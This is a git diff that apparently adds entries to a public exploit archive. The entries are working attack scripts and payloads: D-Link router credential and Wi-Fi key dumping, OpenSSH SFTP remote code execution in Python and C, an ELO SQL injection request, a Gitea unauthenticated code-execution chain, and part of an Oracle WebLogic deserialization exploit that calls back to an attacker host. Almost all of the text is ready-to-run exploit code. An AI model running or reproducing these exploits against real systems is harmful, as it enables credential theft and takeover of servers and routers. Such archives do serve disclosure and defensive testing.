diff --git a/exploits/hardware/webapps/45002.py b/exploits/hardware/webapps/45002.py
new file mode 100755
index 000000000..1b96bd294
--- /dev/null
+++ b/exploits/hardware/webapps/45002.py
@@ -0,0 +1,121 @@
+# Exploit title: D-Link DIR601 2.02NA - Credential disclosure
+# Date: 2018-07-10
+# Exploit Author: Richard Rogerson
+# Vendor Homepage: http://ca.dlink.com/
+# Software Link: http://support.dlink.ca/ProductInfo.aspx?m=DIR-601
+# Version: <= 2.02NA
+# Tested on: D-Link DIR601 Firmware 2.02NA
+# Contact: http://twitter.com/pktlabs
+# Website: https://www.packetlabs.net
+# CVE: N/A
+# Category: Webapps, Remote
+
+
+# 1. Description:
+# Through analyzing the Captcha function implemented in the DIR-601 (2.02NA firmware),
+# a HTTP request was found responsible for the handoff to client-side code.
+# Inspecting the HTTP requests, it was identified that a parameter named ‘table_name’
+# is used to instruct the back-end application which content to return. By abusing this
+# request, it was found possible to retrieve sensitive information relating to the device
+# configuration and administrative credentials.
+
+# It is possible to modify the HTTP POST to my_cgi.cgi and include as table_name references
+# to retrieve the administrative credentials, wireless ssid, and pre-shared key where
+# applicable. Enumerating the naming conventions within the client-side code, it was
+# determined that a number of potentially sensitive parameters/tables exist in the
+# back-end environment which provide significant value if retrieved, four of these include:
+
+# - Admin_user
+# - Wireless_settings
+# - Wireless_security
+# - Wireless_wpa_settings
+
+Sample of the vulnerable POST request:
+
+HTTP Request
+POST /my_cgi.cgi HTTP/1.1
+Host: 192.168.0.1
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Referer: http://192.168.0.1/login_real.htm
+Content-Length: 86
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+
+request=no_auth&request=load_settings&table_name=create_auth_pic&table_name=admin_user <- additional table requested
+
+Sample response:
+
+HTTP Response
+HTTP/1.1 200 OK
+Content-type: text/xml
+Connection: close
+Date: Sat, 01 Jan 2011 00:57:12 GMT
+Server: lighttpd/1.4.28
+Content-Length: 228
+
+150649adminclear-text-password1
+
+
+# 2. Exploit Code:
+
+#!/usr/bin/python
+import socket,sys,urllib,urllib2
+import xml.etree.ElementTree as ET
+
+print """Packetlabs
+====================================
+D-Link DIR-601 Authorization Bypass
+"""
+if len(sys.argv) != 2:
+ print "usage:",sys.argv[0],""
+ sys.exit()
+else:
+ ipaddr=sys.argv[1]
+ print "Retrieving admin username, password and wireless security configuration from",ipaddr
+
+# build URL
+url = 'http://'
+url+= ipaddr
+url+='/my_cgi.cgi'
+data = "request=no_auth&request=load_settings&table_name=admin_user&table_name=user_user&table_name=wireless_settings&table_name=wireless_security&table_name=wireless_wpa_settings"
+
+# send payload
+req = urllib2.Request(url, data)
+response = urllib2.urlopen(req)
+print "Sending payload to:",response.geturl()
+retr = response.read()
+root = ET.fromstring(retr)
+
+# credential dump
+print "\r\nAdmin Creds"
+print "username:",root[0][0].text
+print "password:",root[0][1].text
+
+# dump wireless settings
+print "\r\nWireless Settings"
+sectype=int(root[3][0].text)
+ssid=root[2][2].text
+enctype="none"
+
+print "SSID is:", ssid
+if sectype == 2:
+ enctype="WPA2"
+ key=root[4][3].text
+elif sectype == 1:
+ enctype="WEP("
+ keylength=int(root[3][3].text)
+ if keylength == 5:
+ enctype+="64bit)"
+ key=root[3][5].text
+ elif keylength == 13:
+ enctype+="128bit)"
+ key=root[3][9].text
+ else:
+ key="Error, please inspect xml manually above, keylength=",keylength
+ print retr
+elif sectype == 0:
+ print "Wireless network is open?"
+ sys.exit()
+
+print enctype,"key is:",key
\ No newline at end of file
diff --git a/exploits/linux/remote/45001.py b/exploits/linux/remote/45001.py
new file mode 100755
index 000000000..71ed3935a
--- /dev/null
+++ b/exploits/linux/remote/45001.py
@@ -0,0 +1,114 @@
+# OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux
+# The original discovery by Jann Horn: http://seclists.org/fulldisclosure/2014/Oct/35
+#
+# Adam Simuntis :: https://twitter.com/adamsimuntis
+# Mindaugas Slusnys :: https://twitter.com/mislusnys
+
+import paramiko
+import sys
+import time
+from pwn import *
+
+# parameters
+cmd = 'touch /tmp/pwn; touch /tmp/pwn2'
+host = '172.16.15.59'
+port = 22
+username = 'secforce'
+password = 'secforce'
+
+# connection
+ssh = paramiko.SSHClient()
+ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+ssh.connect(hostname = host, port = port, username = username, password = password)
+sftp = ssh.open_sftp()
+
+# parse /proc/self/maps to get addresses
+log.info("Analysing /proc/self/maps on remote system")
+sftp.get('/proc/self/maps','maps')
+with open("maps","r") as f:
+ lines = f.readlines()
+ for line in lines:
+ words = line.split()
+ addr = words[0]
+ if ("libc" in line and "r-xp" in line):
+ path = words[-1]
+ addr = addr.split('-')
+ BITS = 64 if len(addr[0]) > 8 else 32
+ print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path)
+ libc_base = int(addr[0], 16)
+ libc_path = path
+ if ("[stack]" in line):
+ addr = addr.split("-")
+ saddr_start = int(addr[0], 16)
+ saddr_end = int(addr[1], 16)
+ print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1])
+
+# download remote libc and extract information
+print "[+] Fetching libc from remote system..\n"
+sftp.get(str(libc_path), 'libc.so')
+e = ELF("libc.so")
+sys_addr = libc_base + e.symbols['system']
+exit_addr = libc_base + e.symbols['exit']
+
+# gadgets for the RET slide and system()
+if BITS == 64:
+ pop_rdi_ret = libc_base + next(e.search('\x5f\xc3'))
+ ret_addr = pop_rdi_ret + 1
+else:
+ ret_addr = libc_base + next(e.search('\xc3'))
+
+print "\n[+] system() @ {}".format(hex(sys_addr))
+print "[+] 'ret' @ {}".format(hex(ret_addr))
+if BITS == 64:
+ print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret))
+
+with sftp.open('/proc/self/mem','rw') as f:
+ if f.writable():
+ print "[+] We have r/w permissions for /proc/self/mem! All Good."
+ else:
+ print "[-] Fatal error. No r/w permission for mem."
+ sys.exit(0)
+
+ log.info("Patching /proc/self/mem on the remote system")
+
+ stack_size = saddr_end - saddr_start
+ new_stack = ""
+
+ print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start))
+ #sleep(20)
+ if BITS == 32:
+ new_stack += p32(ret_addr) * (stack_size/4)
+ new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12]
+ new_stack += p32(sys_addr)
+ new_stack += p32(exit_addr)
+ new_stack += p32(saddr_start)
+ else:
+ new_stack += p64(ret_addr) * (stack_size/8)
+ new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32]
+ new_stack += p64(pop_rdi_ret)
+ new_stack += p64(saddr_start)
+ new_stack += p64(sys_addr)
+ new_stack += p64(exit_addr)
+
+ # debug info
+ with open("fake_stack","w") as lg:
+ lg.write(new_stack)
+
+ # write cmd to top off the stack
+ f.seek(saddr_start)
+ f.write(cmd + "\x00")
+
+ # write the rest from bottom up, we're going to crash at some point
+ for off in range(stack_size - 32000, 0, -32000):
+ cur_addr = saddr_start + off
+
+ try:
+ f.seek(cur_addr)
+ f.write(new_stack[off:off+32000])
+ except:
+ print "Stack write failed - that's probably good!"
+ print "Check if you command was executed..."
+ sys.exit(0)
+
+sftp.close()
+ssh.close()
\ No newline at end of file
diff --git a/exploits/linux/webapps/44970.txt b/exploits/linux/webapps/44970.txt
deleted file mode 100644
index a7ecf13d6..000000000
--- a/exploits/linux/webapps/44970.txt
+++ /dev/null
@@ -1,20 +0,0 @@
-# Exploit Title: ModSecurity 3.0.0 - Cross-Site Scripting
-# Date: 2018-07-02
-# Vendor Homepage: https://www.modsecurity.org
-# Software: ModSecurity
-# Category: Web Application Firewall
-# Exploit Author: Adipta Basu
-# Tested on: Mac OS High Sierra
-# CVE: N/A
-# Description: ModSecurity 3.0.0 has XSS via an onError attribute of an IMG element
-
-# Details:
-# After doing source code analysis, I found that if 
-# is passed as a parameter, a pop-up is obtained. This is because the filter flags
-# terms like "script","alert",etc. Moreover it also flags if there is a string placed
-# inside the first bracket. That is why I had to use 111. However document.cookie when
-# passed works fine.
-
-Reproduction Steps:
-
- - Use or
\ No newline at end of file
diff --git a/exploits/linux/webapps/44999.txt b/exploits/linux/webapps/44999.txt
new file mode 100644
index 000000000..6f0845758
--- /dev/null
+++ b/exploits/linux/webapps/44999.txt
@@ -0,0 +1,57 @@
+# Title: Elektronischer Leitz-Ordner 10 - SQL Injection
+# Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
+# Software: https://www.elo.com/en-de/
+# CVE: N/A
+# Affected Products:
+# ELOenterprise 10 (ELO Access Manager <= 10.17.120)
+# ELOenterprise 9 (ELO Access Manager <= 9.17.120)
+# ELOprofessional 10 (ELO Access Manager <= 10.17.120)
+# ELOprofessional 9 (ELO Access Manager <= 9.17.120)
+
+
+
+# Description:
+# ELO is a commercial software product for managing documents and
+# electronic content. Storage and organization is similar to classic
+# paper-based document management. ELO belongs to the category of document
+# management (DMS) and enterprise content management systems (ECM). DMS
+# and ECM systems enable audit-proof archiving of documents and
+# information requiring storage.
+
+# We have discovered a time-based blind SQL injection vulnerability in the
+# ELO Access Manager (<= 9.17.120 and <= 10.17.120) component that makes
+# it possible to read all database content. The vulnerability exists in
+# the HTTP GET parameter "ticket". For example, we succeeded in reading
+# the password hash of the administrator user in the "userdata" table from
+# the "eloam" database.
+
+# Proof of Concept:
+
+GET
+/wf-NAME/social/api/feed/aggregation/201803310000?ticket=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
+IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
+NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
+(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
+name),5,1))>104) WAITFOR DELAY '0:0:1'--
+qvAV&after=1523013041889&lang=de&_dc=1523013101769 HTTP/1.1
+Accept-Encoding: gzip,deflate
+Connection: close
+Accept: */*
+Host: server:9090
+Referer: http://server:9090/wf-NAME/social/api/feed/aggregation/201803310000
+Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv: 59.0) Gecko/20100101
+Firefox/59.0
+
+HTTP/1.1 401 Unauthorized
+Server: Apache-Coyote/1.1
+Content-Type: application/json;charset=UTF-8
+Content-Length: 410
+Date: Fri, 06 Apr 2018 11:57:15 GMT
+Connection: close
+
+{"error":{"code":401,"message":"[TICKET:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\u0027
+IF(UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(name AS
+NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases WHERE name NOT IN
+(SELECT TOP 7 name FROM master..sysdatabases ORDER BY name) ORDER BY
+name),5,1))\u003e104) WAITFOR DELAY \u00270][ELOIX:2001]Sitzungskennung
+ung..ltig oder abgelaufen. Melden Sie sich neu an.[NO-DETAILS]"}}
\ No newline at end of file
diff --git a/exploits/linux_x86-64/remote/45000.c b/exploits/linux_x86-64/remote/45000.c
new file mode 100644
index 000000000..f02d18937
--- /dev/null
+++ b/exploits/linux_x86-64/remote/45000.c
@@ -0,0 +1,196 @@
+#define _GNU_SOURCE
+
+// THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT
+// TRY TO ATTACK BACK, THE CODE IS SLOPPY!
+// (In other words, please don't use this against other people's machines.)
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define min(a,b) (((a)<(b))?(a):(b))
+
+sftp_session sftp;
+
+size_t grab_file(char *rpath, char **out) {
+ size_t allocated = 4000, used = 0;
+ *out = calloc(1, allocated+1);
+ sftp_file f = sftp_open(sftp, rpath, O_RDONLY, 0);
+ if (f == NULL) fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
+ while (1) {
+ ssize_t nbytes = sftp_read(f, *out+used, allocated-used);
+ if (nbytes < 0) fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
+ if (nbytes == 0) {
+ (*out)[used] = '\0';
+ sftp_close(f);
+ return used;
+ }
+ used += nbytes;
+ if (used == allocated) {
+ allocated *= 4;
+ *out = realloc(*out, allocated);
+ }
+ }
+}
+
+void dump_file(char *name, void *buf, size_t len) {
+ FILE *f = fopen(name, "w+");
+ if (!f) perror("can't write to local file"), exit(1);
+ if (fwrite(buf, 1, len, f) != len) fprintf(stderr, "local write failed\n"), exit(1);
+ if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
+}
+
+size_t slurp_file(char *path, char **out) {
+ size_t allocated = 4000, used = 0;
+ *out = calloc(1, allocated+1);
+ FILE *f = fopen(path, "r");
+ if (f == NULL) perror("opening local file failed"), exit(1);
+ while (1) {
+ ssize_t nbytes = fread(*out+used, 1, allocated-used, f);
+ if (nbytes < 0) fprintf(stderr, "Error reading local file %s: %s\n", path, strerror(errno)), exit(1);
+ if (nbytes == 0) {
+ (*out)[used] = '\0';
+ if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
+ return used;
+ }
+ used += nbytes;
+ if (used == allocated) {
+ allocated *= 4;
+ *out = realloc(*out, allocated);
+ }
+ }
+}
+
+int main(int argc, char **argv) {
+ if (argc != 4) fprintf(stderr, "invocation: ./exploit host user 'shell commands here'\n"), exit(1);
+ char *target_host = argv[1];
+ char *target_user = argv[2];
+ char *shell_commands = argv[3];
+
+ ssh_session my_ssh_session;
+ int rc;
+ char *password;
+ // Open session and set options
+ my_ssh_session = ssh_new();
+ if (my_ssh_session == NULL) exit(-1);
+ ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, target_host);
+ ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, target_user);
+ // Connect to server
+ rc = ssh_connect(my_ssh_session);
+ if (rc != SSH_OK) fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
+
+ // Authenticate ourselves
+ password = getpass("Password: ");
+ rc = ssh_userauth_password(my_ssh_session, NULL, password);
+ if (rc != SSH_AUTH_SUCCESS)
+ fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
+
+ sftp = sftp_new(my_ssh_session);
+ if (sftp == NULL) fprintf(stderr, "Error allocating SFTP session: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
+
+ rc = sftp_init(sftp);
+ if (rc != SSH_OK) {
+ fprintf(stderr, "Error initializing SFTP session: %s.\n", ssh_get_error(sftp));
+ sftp_free(sftp);
+ return rc;
+ }
+
+ char *mappings;
+ grab_file("/proc/self/maps", &mappings);
+ //printf("/proc/self/maps dump: \n%s\n\n\n", mappings);
+
+ printf("got /proc/self/maps. looking for libc...\n");
+ // 7fc9e742b000-7fc9e75ad000 r-xp 00000000 fe:00 2753466 /lib/x86_64-linux-gnu/libc-2.13.so
+ long long start_addr, end_addr, offset;
+ char *libc_path = NULL;
+ long long stack_start_addr = 0, stack_end_addr;
+ for (char *p = strtok(mappings, "\n"); p; p = strtok(NULL, "\n")) {
+ if (strstr(p, " r-xp ") && strstr(p, "/libc-")) {
+ if (libc_path) fprintf(stderr, "warning: two times libc?\n");
+ printf("mapping line: %s\n", p);
+ if (sscanf(p, "%Lx-%Lx %*4c %Lx", &start_addr, &end_addr, &offset) != 3) perror("scanf failed"), exit(1);
+ libc_path = strdup(strchr(p, '/'));
+ if (libc_path == NULL) fprintf(stderr, "no path in mapping?"), exit(1);
+ }
+ if (strstr(p, "[stack]")) {
+ if (stack_start_addr != 0) fprintf(stderr, "two stacks? no."), exit(1);
+ printf("mapping line: %s\n", p);
+ if (sscanf(p, "%Lx-%Lx ", &stack_start_addr, &stack_end_addr) != 2) perror("scanf failed"), exit(1);
+ }
+ }
+ if (libc_path == NULL) fprintf(stderr, "unable to find libc\n"), exit(1);
+ if (stack_start_addr == 0) fprintf(stderr, "unable to find stack"), exit(1);
+ printf("remote libc is at %s\n", libc_path);
+ printf("offset %Lx from libc is mapped to %Lx-%Lx\n", offset, start_addr, end_addr);
+
+ char *libc;
+ size_t libc_size = grab_file(libc_path, &libc);
+ dump_file("libc.so", libc, libc_size);
+ printf("downloaded libc, size is %zu bytes\n", libc_size);
+
+ system("objdump -T libc.so | grep ' system$' | cut -d' ' -f1 > system.addr");
+ char *system_offset_str;
+ slurp_file("system.addr", &system_offset_str);
+ long long system_offset;
+ if (sscanf(system_offset_str, "%Lx", &system_offset) != 1) perror("scanf failed"), exit(1);
+ long long remote_system_addr = start_addr+system_offset-offset;
+ printf("remote system() function is at %Lx\n", remote_system_addr);
+
+ printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
+ char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
+ if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
+ long long gadget_address = start_addr + (gadget-(libc+offset));
+ long long ret_address = gadget_address+1;
+ printf("found gadget at %Lx\n", gadget_address);
+
+ printf("remote stack is at %Lx-%Lx\n", stack_start_addr, stack_end_addr);
+ printf("doing it the quick-and-dirty way (that means: pray that the target"
+ "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
+ long long stack_len = stack_end_addr - stack_start_addr;
+ /*if (stack_len > 32000) {
+ stack_len = 32000;
+ stack_start_addr = stack_end_addr - stack_len;
+ }*/
+ char *new_stack = malloc(stack_len);
+
+ // first fill it with our ret slide
+ for (long long *s = (void*)new_stack; s<(long long*)(new_stack+stack_len); s++) {
+ *s = ret_address;
+ }
+
+ // put some shell commands in the head
+ strcpy(new_stack, shell_commands);
+
+ // put the mini-ROP-chain at the end
+ // [address of pop rdi] [stack head] [address of system]
+ long long *se = (void*)(new_stack + stack_len);
+ se[-3] = gadget_address;
+ se[-2] = stack_start_addr;
+ se[-1] = remote_system_addr;
+
+ printf("Prepared the new stack. Now comes the moment of truth: push the new stack over and pray.\n");
+ sftp_file mem = sftp_open(sftp, "/proc/self/mem", O_RDWR, 0);
+ if (mem == NULL) fprintf(stderr, "Error opening remote memory: %s\n", ssh_get_error(sftp)), exit(1);
+
+ // first send over the string
+ rc = sftp_seek64(mem, stack_start_addr);
+ if (rc) fprintf(stderr, "Error seeking to remote stack: %s\n", ssh_get_error(sftp)), exit(1);
+ ssize_t mem_written = sftp_write(mem, new_stack, strlen(shell_commands)+1);
+ if (mem_written != strlen(shell_commands)+1) fprintf(stderr, "didn't write the whole new stack\n");
+
+ // now send over the rest right-to-left
+ for (long long off = stack_len-32000; off >= 0; off -= 32000) {
+ rc = sftp_seek64(mem, stack_start_addr+off);
+ if (rc) fprintf(stderr, "Error seeking: %s\n", ssh_get_error(sftp)), exit(1);
+ mem_written = sftp_write(mem, new_stack+off, 32000);
+ if (mem_written != 32000) fprintf(stderr, "stack write failed – that's probably good :)\n"), exit(0);
+ }
+
+ return 0;
+}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/44996.py b/exploits/multiple/webapps/44996.py
new file mode 100755
index 000000000..d52d512a7
--- /dev/null
+++ b/exploits/multiple/webapps/44996.py
@@ -0,0 +1,200 @@
+# pip install PyJWT requests
+# pip install dulwich==0.19.0
+from requests import Request, Session, get, post
+import jwt
+import time
+import base64
+import os
+import re
+import time
+import threading
+import random
+import string
+import urlparse
+import urllib
+from dulwich import porcelain
+
+print "Gitea 1.4.0"
+print "Unauthenticated Remote Code Execution"
+print "by Kacper Szurek"
+print "https://security.szurek.pl/"
+print "https://twitter.com/KacperSzurek"
+print "https://www.youtube.com/c/KacperSzurek"
+
+def decode_base64(data):
+ missing_padding = len(data) % 4
+ if missing_padding != 0:
+ data += '='* (4 - missing_padding)
+ return base64.urlsafe_b64decode(data)
+
+def get_random():
+ return ''.join(random.choice(string.lowercase) for x in range(6))
+
+def get_csrf(path):
+ temp = s.get("{}{}".format(url, path))
+
+ content = temp.text.encode("utf-8")
+
+ csrf = re.search('name="_csrf" content="([^"]+)"', content)
+
+ if not csrf:
+ print "[-] Cannot get CSRF token"
+ os._exit(0)
+
+ return csrf.group(1)
+
+command = "whoami"
+url = 'http://192.168.1.103:3000/'
+session_value = '11session'
+
+r = get('{}api/v1/repos/search?limit=1'.format(url))
+try:
+ out = r.json()['data']
+except:
+ print "[-] Probably not gitea url"
+ os._exit(0)
+
+if len(out) != 1:
+ print "[-] There is no public repos"
+ os._exit(0)
+
+out = out[0]
+
+public_repo_id = int(out['id'])
+public_user_id = int(out['owner']['id'])
+public_repo_url = out['full_name']
+
+print "[+] Found public repo {} ID {}".format(public_repo_url, public_repo_id)
+
+json = {
+ "Oid": "....custom/conf/app.ini",
+ "Size": 1000000, # This needs to be bigger than file
+ "User" : "a",
+ "Password" : "a",
+ "Repo" : "a",
+ "Authorization" : "a"
+}
+
+s = Session()
+
+r = s.post('{}{}.git/info/lfs/objects'.format(url, public_repo_url), json=json, headers={'Accept': 'application/vnd.git-lfs+json'})
+if '"Unauthorized"' not in r.text or '"expires_at"' not in r.text:
+ print "[-] Cannot create fake OID for app.ini"
+ os._exit(0)
+
+print "[+] Fake OID for app.ini created"
+
+r = get(r'{}{}.git/info/lfs/objects/....custom%2fconf%2fapp.ini/sth'.format(url, public_repo_url))
+
+if "RUN_USER" not in r.text:
+ print "[-] Cannot get app.ini"
+ os._exit(0)
+
+
+secret_match = re.search('LFS_JWT_SECRET *= *(.*?)[\r\n]', r.text)
+if not secret_match:
+ print "[-] Cannot find JWT secret in app.ini"
+ os._exit(0)
+
+jwt_secret = str(secret_match.group(1).strip())
+print "[+] Found secret: {}-".format(jwt_secret)
+jwt_secret = decode_base64(jwt_secret)
+
+# This needs to be INT, not STR
+current_time = int(time.time())-(60*60*24*1000)
+current_time2 = int(time.time())+(60*60*24*1000)
+token = jwt.encode({'user': public_user_id, 'repo': public_repo_id, 'op': 'upload', 'exp': current_time2, 'nbf': current_time}, jwt_secret, algorithm='HS256')
+
+print "[+] Generate jwt token for user {} and repo {}".format(public_user_id, public_repo_id)
+print token
+
+json['Oid'] = '....data/sessions/1/1/{}'.format(session_value)
+
+r = s.post('{}{}.git/info/lfs/objects'.format(url, public_repo_url), json=json, headers={'Accept': 'application/vnd.git-lfs+json'})
+if '"Unauthorized"' not in r.text or '"expires_at"' not in r.text:
+ print "[-] Cannot create fake OID for session"
+ os._exit(0)
+
+print "[+] Fake OID for session created"
+
+def race_condition_thread():
+ print "\n[+] Race condition thread started"
+ ts = Session()
+ req = Request('PUT', r'{}{}.git/info/lfs/objects/....data%2fsessions%2f1%2f1%2f{}'.format(url, public_repo_url, session_value) , data=open('session.tmp', "rb").read())
+ prepped = req.prepare()
+ # We need to set explicit big content length for race condition
+ prepped.headers['Content-Length'] = 150000
+ prepped.headers['Accept'] = 'application/vnd.git-lfs'
+ prepped.headers['Content-Type'] = 'application/vnd.git-lfs'
+ prepped.headers['Authorization'] = 'Bearer {}'.format(token)
+ # This will hang because of big Content-Length
+ response = ts.send(prepped)
+ print "\n[-] Race condition thread ended before exploit finish, try again"
+
+thread = threading.Thread(target=race_condition_thread, args=())
+thread.daemon = True
+thread.start()
+print "\n[+] Sleep 5 seconds"
+time.sleep(5)
+
+print "[+] Try using fake cookie: {}".format(session_value)
+
+s = Session()
+s.headers.update({'Cookie': 'i_like_gitea={}.tmp;'.format(session_value)})
+
+r = s.get('{}api/v1/user'.format(url))
+data = r.json()
+
+if not "id" in data or data['id'] != 1:
+ print "[-] Impersonation failed"
+ os._exit(0)
+
+user_name = data['login']
+user_id = data['id']
+
+print "[+] Login as {} ID {}".format(user_name, user_id)
+
+csrf = get_csrf('user/settings/applications')
+post_token = s.post('{}user/settings/applications'.format(url), data={'_csrf':csrf, 'name':get_random()}, allow_redirects=False)
+
+try:
+ login_token = post_token.cookies['macaron_flash']
+ login_token = dict(urlparse.parse_qsl(urllib.unquote(login_token)))
+ login_token = login_token['info']
+except:
+ print "[-] Cannot create token"
+ os._exit(0)
+
+print "[+] Login token: {}".format(login_token)
+
+csrf = get_csrf('repo/create')
+admin_repo_name = get_random()
+
+print "[+] Try create repo {}".format(admin_repo_name)
+
+repo_post = s.post("{}repo/create".format(url), data={'_csrf':csrf, 'uid':user_id, 'repo_name':admin_repo_name, 'readme': 'Default', 'auto_init':'on'}, allow_redirects=False)
+
+if repo_post.status_code != 302:
+ print "[-] Cannot create admin repo"
+ os._exit(0)
+
+csrf = get_csrf('{}/{}/settings/hooks/git/update'.format(user_name, admin_repo_name))
+hook_posts = s.post('{}{}/{}/settings/hooks/git/update'.format(url, user_name, admin_repo_name), data={'_csrf':csrf, 'content':"#!/bin/sh\n{}>objects/info/exploit".format(command)}, allow_redirects=False)
+
+if hook_posts.status_code != 302:
+ print "[-] Cannot updatehook"
+ os._exit(0)
+
+clone_url = '{}{}:{}@{}{}/{}.git'.format(url[0:7], login_token, "", url[7:], user_name, admin_repo_name)
+
+temp_repo_dir = get_random()
+r = porcelain.clone(clone_url, temp_repo_dir)
+porcelain.commit(r, get_random())
+porcelain.push(r, clone_url, "master")
+
+command_output = s.get('{}{}/{}/objects/info/exploit'.format(url, user_name, admin_repo_name))
+if command_output.status_code != 200:
+ print "[-] Cannot get exploit output"
+ os._exit(0)
+
+print command_output.text.encode("utf-8")
\ No newline at end of file
diff --git a/exploits/multiple/webapps/44998.py b/exploits/multiple/webapps/44998.py
new file mode 100755
index 000000000..49f9c3bf5
--- /dev/null
+++ b/exploits/multiple/webapps/44998.py
@@ -0,0 +1,146 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+
+from argparse import RawTextHelpFormatter
+import socket, argparse, subprocess, ssl, os.path
+
+HELP_MESSAGE = '''
+--------------------------------------------------------------------------------------
+Developped by bobsecq: quentin.hardy@protonmail.com (quentin.hardy@bt.com)
+
+This script is the first public exploit/POC for:
+- Exploiting CVE-2017-3248 (Oracle WebLogic RMI Registry UnicastRef Object Java Deserialization Remote Code Execution)
+- Checking if a weblogic server is vulnerable
+
+This script needs the last version of Ysoserial (https://github.com/frohoff/ysoserial)
+
+Version affected (according to Oracle):
+- 10.3.6.0
+- 12.1.3.0
+- 12.2.1.0
+- 12.2.1.1
+--------------------------------------------------------------------------------------
+'''
+'''
+Tested on 12.1.2.0
+
+For technical information, see:
+- https://www.tenable.com/security/research/tra-2017-07
+- http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
+
+Vulnerability identified by Jacob Baines (Tenable Network Security)
+but exploit/POC has not been published!
+'''
+
+#COMMANDS
+ARGS_YSO_GET_PAYLOD = "JRMPClient {0}:{1} |xxd -p| tr -d '\n'" #{0}: IP, {1}: port for connecting 'back' (i.e. attacker IP)
+CMD_GET_JRMPCLIENT_PAYLOAD = "java -jar {0} {1}"# {0} YSOSERIAL_PATH, {1}ARGS_YSO_GET_PAYLOD
+CMD_YSO_LISTEN = "java -cp {0} ysoserial.exploit.JRMPListener {1} {2} '{3}'"# {0} YSOSERIAL_PATH, {1}PORT, {2}payloadType, {3}command
+
+#PAYLOADS
+#A. Packet 1 to send:
+payload_1 = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'
+#B. Packet 2 to send:
+payload_2 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a5